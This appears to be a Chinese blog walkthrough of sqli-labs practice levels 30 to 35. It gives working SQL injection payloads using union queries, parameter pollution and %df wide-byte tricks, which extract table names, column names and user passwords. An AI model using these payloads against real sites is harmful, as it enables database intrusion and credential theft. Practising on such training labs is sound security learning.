sqlilabs第三十关到第三十五关靶场攻略

第三十关

第三十关和二十九关差不多,将单引号换成双引号

查询表名,字段名,数据

复制代码
?id=1&id=-2" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
复制代码
?id=1&id=-2" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
复制代码
?id=1&id=-2" union select 1,group_concat(password,username),3 from users--+

第三十一关

查询数据库名

查询表名

复制代码
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

普通的联合注入( 如果不行,可以尝试一下?id=1&id=-1") )

照正常流程走就好了

第三十二关(宽字节注入)

在1后面加%df让他成为一个字符

复制代码
?id=-1%df' union select 1,2,database()--+

后面还是联合查询一样的流程

第三十三关

跟三十二一样都是宽字节注入\

复制代码
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
复制代码
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

第三十四关

这关还是宽字节注入,可以到是POST提交

我们到bp重放器进行注入

复制代码
admin%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() #

继续联合注入就行

第三十五关

数字型的宽字节注入但是这关不需要%df

直接联合注入就拿下这关

复制代码
?id=-1 union select 1,2,database()--+
复制代码
?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database() #
复制代码
?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273 #
相关推荐
武昌库里写JAVA2 小时前
JAVA面试汇总(四)JVM(一)
java·vue.js·spring boot·sql·学习
xiep14383335102 小时前
Ubuntu 安装带证书的 etcd 集群
数据库·etcd
Java小白程序员3 小时前
Spring Framework:Java 开发的基石与 Spring 生态的起点
java·数据库·spring
老虎06273 小时前
数据库基础—SQL语句总结及在开发时
数据库·sql·oracle
爱掘金的土拨鼠5 小时前
国产化dm数据库锁表解锁
数据库
花花无缺5 小时前
MySQL 的存储引擎-InnoDB 和 MyISAM的对比
mysql
苏琢玉5 小时前
如何让同事自己查数据?写一个零依赖 PHP SQL 查询工具就够了
mysql·php
庖丁解java5 小时前
N个Utils
数据库
Mr. zhihao5 小时前
SQL LEFT JOIN 与 WHERE 条件的隐藏坑
数据库·sql
2301_793086876 小时前
Redis 04 Reactor
数据库·redis·缓存